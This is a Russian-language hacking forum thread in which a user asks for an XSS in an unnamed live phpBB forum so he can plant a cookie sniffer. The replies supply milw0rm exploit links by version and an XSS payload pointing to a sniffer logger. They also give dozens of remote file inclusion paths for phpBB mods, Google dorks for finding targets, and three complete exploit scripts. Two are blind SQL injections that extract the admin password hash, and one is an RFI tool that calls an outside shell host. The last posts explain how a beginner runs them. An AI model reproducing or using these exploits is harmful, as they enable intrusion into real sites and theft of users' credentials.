Срочно под PHPBB нyжны баги!

[Одинокий Волк]

Какая версия хз, нужно XSS как минимум, сам форум урл дать не могу.
Всё что на ачате выложено не катит, следовательно версия последняя должна стоять, но не факт что в старой не профиксили. Никаких модов на форуме нет.
Аватары и загрузка или вставка в подпись картинок обрезана... короче даже снифер не где поставить.... нужна XSS для сообщений или в подпись поставить снифер.

 

[Se613]

Одинокий Волк

Мож это пойдёт?

Ну или это если поможет.

 

[baltazar]

хз,опреди версию,вот скину,откуда оно у меня на винте хз))
phpBB 2.0.4
Exploit: http://milw0rm.com/id.php?id=47

phpBB 2.0.5
Exploit: http://milw0rm.com/id.php?id=44

phpBB 2.0.6
Exploit: http://milw0rm.com/id.php?id=137

phpBB 2.0.10
Exploit: http://milw0rm.com/id.php?id=647

phpBB <= 2.0.13
Exploit: http://milw0rm.com/id.php?id=907

phpBB <= 2.0.15
Exploit: http://milw0rm.com/id.php?id=1080

viewtopic.php?t=1&highlight='.printf(md5(test)).'

phpBB <= 2.0.16
XSS :
" target="_blank">www.ut'
http://antichat.ru/sniff/log.php

phpBB <= 2.0.17
Exploit: http://rst.void.ru/download/r57phpbb2017.txt

phpBB <= 2.0.19
Exploit:
http://www.milw0rm.com/exploits/1661
http://www.milw0rm.com/exploits/1661

phpBB <= 2.0.20

Exploit: http://www.milw0rm.com/exploits/1780

phpBB <= 2.0.21

Exploit: http://www.milw0rm.com/exploits/2348

Добавлено через 17 минут

Моды​

TopList Hack for PHPBB <= 1.3.8

/toplist.php?f=toplist_top10&phpbb_root_path=shell

Advanced GuestBook

/admin/addentry.php?phpbb_root_path=shell

Knowledge Base Mod

/includes/kb_constants.php?module_root_path=shell

phpBB auction mod

/auction/auction_common.php?phpbb_root_path=shell

phpRaid <= 3.0.b3

/[phpraidpath]/auth/auth.php?phpbb_root_path=shell

/[phpraidpath]/auth/auth_phpbb/phpbb_root_path=shell

/[phpraidpath]/auth/auth.php?smf_root_path=shell

/[phpraidpath]/auth/auth_SMF/smf_root_path=shell

PafileDB

/[pdbpath]/includes/pafiledb_constants.php?module_root_path=shell

Foing <= 0.7.0

/index.php?phpbb_root_path=shell

/song.php?phpbb_root_path=shell

/faq.php?phpbb_root_path=shell

/list.php?phpbb_root_path=shell

/gen_m3u.php?phpbb_root_path=shell

/playlist.php?phpbb_root_path=shell

Activity MOD Plus

/language/lang_english/lang_activity.php?phpbb_root_path=shell

Blend Portal <= 1.2.0

/blend_data/blend_common.php?phpbb_root_path=shell

Minerva <= 2.0.8a

/stat_modules/users_age/module.php?phpbb_root_path=shell

Minerva <= v238

/admin/admin_topic_action_logging.php?setmodules=attach&p hpbb_root_path=shell

FlashBB <= 1.1.5

/phpbb/getmsg.php?phpbb_root_path=shell

HoRCMS <= 1.3.1

/includes/functions_cms.php?phpbb_root_path=shell

mail2forum <= 1.2

/m2f/m2f_forum.php?m2f_root_path=shell

/m2f/m2f_phpbb204.php?m2f_root_path=shell

/m2f/m2f_forum.php?m2f_root_path=shell

/m2f/m2f_mailinglist.php?m2f_root_path=shell

/m2f/m2f_cron.php?m2f_root_path=shell

WoW Roster

/[roster_path]/lib/phpbb.php?subdir=shell

Integramod Portal

/includes/functions_mod_user.php?phpbb_root_path=shell

/includes/functions.php?phpbb_root_path=shell

Shadow Premod <= 2.7.1

/includes/functions_portal.php?phpbb_root_path=shell

phpBB XS <= 0.58

/includes/functions_kb.php?phpbb_root_path=shell

/includes/bbcb_mg.php?phpbb_root_path=shell

/includes/functions.php?phpbb_root_path=shell

pnphpbb

/includes/functions_admin.php?phpbb_root_path=shell

Admin Topic Action Logging

/admin/admin_topic_action_logging.php?setmodules=pagestar t&phpbb_root_path=

phpBB Static Topics <= 1.0

/includes/functions_static_topics.php?phpbb_root_path=shell

Security Suite IP Logger

/includes/logger_engine.php?phpbb_root_path=shell

Dimension of phpBB

/includes/themen_portal_mitte.php?phpbb_root_path=shell

/includes/logger_engine.php?phpbb_root_path=shell

/includes/functions.php?phpbb_root_path=shell

phpBB User Viewed Posts Tracker

/includes/functions_user_viewed_posts.php?phpbb_root_path=shell

phpBB RANDOm USER REGISTRATION NUMBER

/includes/functions_num_image.php?phpbb_root_path=shell

phpBB insert user <= 0.1.2

/includes/functions_mod_user.php?phpbb_root_path=shell

phpBB Import Tools Mod <= 0.1.4

/includes/functions_mod_user.php?phpbb_root_path=shell

phpBB Ajax Shoutbox <= 0.0.5

/shoutbox.php?phpbb_root_path=shell

SpamBlockerMOD <= 1.0.2

/root/includes/antispam.php?phpbb_root_path=shell

phpBB PlusXL 2.x <= biuld 272

/mods/iai/includes/constants.php?phpbb_root_path=shell

AMAZONIA MOD

/zufallscodepart.php?phpbb_root_path=shell

news defilante horizontale <= 4.1.1

/fran?ais/root/includes/functions_newshr.php?phpbb_root_path=shell

phpBB lat2cyr <= 1.0.1

/lat2cyr.php?phpbb_root_path=shell

SpamOborona PHPBB Plugin

/admin/admin_spam.php?phpbb_root_path=shell

RPG Events 1.0.0

/functions_rpg_events.php?phpbb_root_path=shell

phpBB archive for search engines

/includes/archive/archive_topic.php?phpbb_root_path=shell

PhpBB Prillian French

/language/lang_french/lang_prillian_faq.php?phpbb_root_path=shell

phpBB ACP User Registration Mod 1.00

/includes/functions_mod_user.php?phpbb_root_path=shell

phpBB Security <= 1.0.1

/phpbb_security.php?phpbb_root_path=shell

phpBBFM version 206-3-3

/language/lang_english/lang_prillian_faq.php?phpbb_root_path=shell

Fully Modded phpBB 2 ​

/faq.php?foing_root_path=shell

/index.php?foing_root_path=shell

/list.php?foing_root_path=shell

/login.php?foing_root_path=shell

/playlist.php?foing_root_path=shell

/song.php?foing_root_path=shell

/view_artist.php?foing_root_path=shell

/view_song.php?foing_root_path=shell

/login.php?foing_root_path=shell

/playlist.php?foing_root_path=shell

/song.php?foing_root_path=shell

/flash/set_na.php?foing_root_path=shell

/flash/initialise.php?foing_root_path=shell

/flash/get_song.php?foing_root_path=shell

/includes/common.php?foing_root_path=shell

/admin/nav.php?foing_root_path=shell

/admin/main.php?foing_root_path=shell

/admin/list_artists.php?foing_root_path=shell

/admin/index.php?foing_root_path=shell

/admin/genres.php?foing_root_path=shell

/admin/edit_artist.php?foing_root_path=shell

/admin/edit_album.php?foing_root_path=shell

/admin/config.php?foing_root_path=shell

/admin/admin_status.php?foing_root_path=shell

DORK'S

Powered by phpBB 2

"Powered by phpBB"
Powered by phpBB

ext: php intext:"phpbb_installed"

"Powered by phpBB * 2002, 2006 phpBB Group" -demo

"2002, 2006 phpBB Group"
"phpBB Group"
phpbb 2

intext:"Powered by phpBB 2.0."

inurl:"index.php?sid="
inurl:"kb.php?mode=cat"
inurl:"templates""http://forum.xaknet.ru/images/" logo_phpBB.gif
inurl:/phpbb2/
inurl:/phpbb/

+"Powered by phpBB 2.0.6..10" -phpbb.com -phpbb.pl
intext:"Powered by phpBB 2.0.13" inurl:"cal_view_month.php"|inurl:"downloads.php"
intext:"Powered by phpBB 2.0." inurl:"kb.php?mode=cat"

"Powered by phpBB" "2001, 2005 phpBB Group" inurl:index.php inurl:sid=
inurl:/install.php Welcome to phpBB
intext:"Powered by phpBB 2.0" -site:phpbb.com
intext:"Powered by phpBB 2.0" -site:phpbb.com -"2.0.11"
intitle:"Welcome.to.phpbb.*.installation"
filetype:php inurl:phpbb2 intext:Index -intext:2.0.13 -intext:2005
+intext:"* by phpBB ©"
"powered b" "y phpbb"
inurl:redirect=admin/index.php "Powered by phpBB"
inurl:admin/index.php "Powered" "phpBB"

"Powered by phpbb modified v1.8 by Przemo"
"Powered by" "v1.8 by Przemo"
"Powered by" "v1.8 by Przemo" -edu -demo -shoutbox
"Powered by" "v1.8 by Przemo" inurl:index.php -edu -demo -shoutbox 
"powered by PhpBB 2.0.15" -site:phpbb.com

 

[Rostov114]

Такое чуство что 3я версия не уязвима....

 

[el-]

/docs/CHANGELOG.html
ммм ?

 

[-SMith-]

Rostov114, просто нужно по чаще смотреть milw0rm.com

phpBB 3 (memberlist.php) Remote SQL Injection Exploit

#!/usr/bin/php -q -d short_open_tag=on
<?
echo "PhpBB 3 memberlist.php/'ip' argument SQL injection / admin credentials disclosure\n";
echo "by rgod rgod@autistici.org\n";
echo "site: [url=http://retrogod.altervista.org\n";]http://retrogod.altervista.org\n";[/url]
echo "dork, version specific: \"Powered by phpBB * 2002, 2006 phpBB Group\"\n\n";

/*
works regardless of php.ini settings
you need a global moderator account with "simple moderator" role
*/

if ($argc<5) {
echo "Usage: php ".$argv[0]." host path user pass OPTIONS\n";
echo "host:      target server (ip/hostname)\n";
echo "path:      path to phpbb3\n";
echo "user/pass: u need a valid user account with global moderator rights\n";
echo "Options:\n";
echo "   -T[prefix]   specify a table prefix different from default (phpbb_)\n";
echo "   -p[port]:    specify a port other than 80\n";
echo "   -P[ip:port]: specify a proxy\n";
echo "   -u[number]:  specify a user id other than 2 (admin)\n";
echo "   -x:          disclose table prefix through error messages\n";
echo "Example:\r\n";
echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u\r\n";
echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u -TPHPBB_ -u7\n";
die;
}

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
   $c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
   }
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
  #debug
  #echo "\r\n".$html;
}

$host=$argv[1];
$path=$argv[2];
$user=$argv[3];
$pass=$argv[4];
$port=80;
$prefix="PHPBB_";
$user_id="2";//admin
$discl=0;
$proxy="";
for ($i=3; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
if ($temp=="-T")
{
  $prefix=str_replace("-T","",$argv[$i]);
}
if ($temp=="-u")
{
  $user_id=str_replace("-u","",$argv[$i]);
}
if ($temp=="-x")
{
  $discl=1;
}
}

if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

$data="username=".urlencode($user);
$data.="&password=".urlencode($pass);
$data.="&redirect=index.php";
$data.="&login=Login";
$packet="POST ".$p."ucp.php?mode=login HTTP/1.0\r\n";
$packet.="Referer: http://$host$path/ucp.php?mode=login\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
$cookie="";
$temp=explode("Set-Cookie: ",$html);
for ($i=1; $i<=count($temp)-1; $i++)
{
 $temp2=explode(" ",$temp[$i]);
 $cookie.=" ".$temp2[0];
}
if (eregi("_u=1;",$cookie))
{
//echo $html."\n";//debug
//die("Unable to login...");
}
echo "cookie -> ".$cookie."\r\n";
if ($discl)
{
$sql="'suntzuuuuu";
echo "sql -> ".$sql."\n";
$sql=urlencode(strtoupper($sql));
$data="username=";
$data.="&icq=";
$data.="&email=";
$data.="&aim=";
$data.="&joined_select=lt";
$data.="&joined=";
$data.="&yahoo=";
$data.="&active_select=lt";
$data.="&active=";
$data.="&msn=";
$data.="&count_select=eq";
$data.="&count=";
$data.="&jabber=";
$data.="&sk=c";
$data.="&sd=a";
$data.="&ip=".$sql;
$data.="&search_group_id=0";
$data.="&submit=Search";
$packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cookie: ".$cookie." \r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (strstr($html,"You have an error in your SQL syntax"))
{
$temp=explode("posts",$html);
$temp2=explode(" ",$temp[0]);
$prefix=strtoupper($temp2[count($temp2)-1]);
echo "prefix -> ".$prefix."\n";sleep(2);
}
}

$md5s[0]=0;//null
$md5s=array_merge($md5s,range(48,57)); //numbers
$md5s=array_merge($md5s,range(97,102));//a-f letters
//print_r(array_values($md5s));
$j=1;$password="";
while (!strstr($password,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
if (in_array($i,$md5s))
{
  $sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USER_PASSWORD,".$j.",1))=$i),$user_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999";
  echo "sql -> ".$sql."\n";
  $sql=urlencode(strtoupper($sql));
  $data="username=";
  $data.="&icq=";
  $data.="&email=";
  $data.="&aim=";
  $data.="&joined_select=lt";
  $data.="&joined=";
  $data.="&yahoo=";
  $data.="&active_select=lt";
  $data.="&active=";
  $data.="&msn=";
  $data.="&count_select=eq";
  $data.="&count=";
  $data.="&jabber=";
  $data.="&sk=c";
  $data.="&sd=a";
  $data.="&ip=".$sql;
  $data.="&search_group_id=0";
  $data.="&submit=Search";
  $packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n";
  $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
  $packet.="Host: ".$host."\r\n";
  $packet.="Content-Length: ".strlen($data)."\r\n";
  $packet.="Connection: Close\r\n";
  $packet.="Cookie: ".$cookie." \r\n\r\n";
  $packet.=$data;
  sendpacketii($packet);
  if (!strstr($html,"No members found for this search criteria")) {$password.=chr($i);echo "password -> ".$password."[???]\r\n";sleep(2);break;}
  }
  if ($i==255) {die("Exploit failed...");}
}
$j++;
}

$j=1;$admin="";
while (!strstr($admin,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
  $sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USERNAME,".$j.",1))=$i),$user_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999";
  echo "sql -> ".$sql."\n";
  $sql=urlencode(strtoupper($sql));
  $data="username=";
  $data.="&icq=";
  $data.="&email=";
  $data.="&aim=";
  $data.="&joined_select=lt";
  $data.="&joined=";
  $data.="&yahoo=";
  $data.="&active_select=lt";
  $data.="&active=";
  $data.="&msn=";
  $data.="&count_select=eq";
  $data.="&count=";
  $data.="&jabber=";
  $data.="&sk=c";
  $data.="&sd=a";
  $data.="&ip=".$sql;
  $data.="&search_group_id=0";
  $data.="&submit=Search";
  $packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n";
  $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
  $packet.="Host: ".$host."\r\n";
  $packet.="Content-Length: ".strlen($data)."\r\n";
  $packet.="Connection: Close\r\n";
  $packet.="Cookie: ".$cookie." \r\n\r\n";
  $packet.=$data;
  sendpacketii($packet);
  if (!strstr($html,"No members found for this search criteria")) {$admin.=chr($i);echo "password -> ".$admin."[???]\r\n";sleep(2);break;}
  }
  if ($i==255) {die("Exploit failed...");}
$j++;
}
echo "--------------------------------------------------------------------\r\n";
echo "admin          -> ".$admin."\r\n";
echo "password (md5) -> ".$password."\r\n";
echo "--------------------------------------------------------------------\r\n";

function is_hash($hash)
{
 if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
 else {return false;}
}

if (is_hash($password)) {echo "Exploit succeeded...";}
else {echo "Exploit failed...";}
?>

# milw0rm.com [2006-07-13]

Extreme phpBB 3.0.1 (functions.php) Remote File Include Exploit

# © xoron
#
# [Name: phpBB Extreme 3.0.1 (phpbb_root_path) Remote File Include Exploit ]
#
# [Author: xoron]
# [Exploit coded by xoron]
#
# [Download: [url=http://sourceforge.net/project/showfiles.php?group_id=95900]http://sourceforge.net/project/showfiles.php?group_id=95900[/url] ]
#
# [Tesekkurler: pang0, DJR]
# 
# [POC: /includes/functions.php?phpbb_root_path=http://evilscripts?]
#
# [Vuln Codes: include_once( $phpbb_root_path . './includes/functions_categories_hierarchy.' . $phpEx );x );
#
#
$rfi = "functions.php?phpbb_root_path="; 
$path = "/includes/";
$shell = "http://pang0.by.ru/shall/pang057.zz?cmd=";
print "Language: English // Turkish\nPlz Select Lang:\n"; $dil = <STDIN>; chop($dil);
if($dil eq "English"){
print "&copy; xoron\n";
&ex;
}
elsif($dil eq "Turkish"){
print "Kodlayan xoron\n";
&ex;
}
else {print "Plz Select Languge\n"; exit;}
sub ex{
$not = "Victim is Not Vunl.\n" and $not_cmd = "Victim is Vunl but Not doing Exec.\n"
and $vic = "Victim Addres? with start http:// :" and $thx = "Greetz " and $diz = "Dictionary?:" and $komt = "Command?:"
if $dil eq "English";
$not = "Adreste RFI acigi Yok\n" and $not_cmd = "Adresde Ac?k Var Fakat Kod Calismiyor\n"
and $vic = "Ornek Adres http:// ile baslayan:" and $diz = "Dizin?: " and $thx = "Tesekkurler " and $komt = "Command?:"
if $dil eq "Turkish";
print "$vic";
$victim = <STDIN>;
chop($victim);
print "$diz";
$dizn = <STDIN>;
chop($dizn);
$dizin = $dizn;
$dizin = "/" if !$dizn;
print "$komt";
$cmd = <STDIN>;
chop($cmd);
$cmmd = $cmd;
$cmmd = "dir" if !$cmd;
$site = $victim;
$site = "http://$victim" if !($victim =~ /http/);
$acacaz = "$site$dizin$rfi$shell$cmmd";
print "&copy; xoron.info - xoron.biz\n$thx: pang0, chaos, can bjorn\n";
sleep 3;
system("start $acacaz");
}

# milw0rm.com [2007-02-24]

phpBB 3 (Mod Tag Board <= 4) Remote Blind SQL Injection Exploit

#!/usr/bin/perl 
# ---------------------------------------------------------------
# phpBB 3 (Mod Tag Board <= 4) Remote Blind SQL Injection Exploit  
# by athos - staker[at]hotmail[dot]it
# [url=http://bx67212.netsons.org/forum/viewforum.php?f=3]http://bx67212.netsons.org/forum/viewforum.php?f=3[/url]
# ---------------------------------------------------------------
# Note: Works regardless PHP.ini settings!
# Thanks meh also know as cHoBi
# ---------------------------------------------------------------

use strict;
use LWP::UserAgent;

my ($hash,$time1,$time2);

my @chars = (48..57, 97..102); 
my $http  = new LWP::UserAgent;

my $host  = shift;
my $table = shift;
my $myid  = shift or &usage;


sub injection
{
    my ($sub,$char) = @_;
    
    return "/tag_board.php?mode=controlpanel&action=delete&id=".
           "1+and+(select+if((ascii(substring(user_password,${sub},1)".
           ")=${char}),benchmark(230000000,char(0)),0)+from+${table}_us".
           "ers+where+user_id=${myid})--";
}


sub usage
{
    print STDOUT "Usage: perl $0 [host] [table_prefix] [user_id]\n";
    print STDOUT "Howto: perl $0 [url=http://localhost/phpBB]http://localhost/phpBB[/url] phpbb 2\n";
    print STDOUT "by athos - staker[at]hotmail[dot]it\n";
    exit;
}


syswrite(STDOUT,'Hash MD5: ');

for my $i(1..33)
{
    for my $j(0..16)
    {
        $time1 = time();

        $http->get($host.injection($i,$chars[$j]));
        
        $time2 = time();

        if($time2 - $time1 > 6)
        {
            syswrite(STDOUT,chr($chars[$j]));
            $hash .= chr($chars[$j]); 
            last;
        }
        
        if($i == 1 && length $hash < 0)
        {
            syswrite(STDOUT,"Exploit Failed!\n");
            exit;
        } 
    }
}

# milw0rm.com [2008-12-08]

 

[akm0047]

Подскажите начинающему, на каком языке написаны последние три эксплоита?

 

[Fallen]

#!/usr/bin/php -q -d short_open_tag=on

php

#!/usr/bin/perl

perl

запуск:

X:\php\php.exe X:\sploit\sploit1.php -param sploit
если винда. указать параметры с какими запускать сплойт.

perl запускать аналогично

 

[akm0047]

Спасибо. А средний код на каком языке?
А что за параметры под виндой?

 

[Gr.dog]

akm0047
php, perl, perl

Параметры программы имелось ввиду , после слов "если винда" стоит точка )

 

[Веля Солнышкин]

Лучше сплойты на серверах запускать,а не у себя,а то ещё выполнит какой-нить умелец что...VertrigoServ/Apache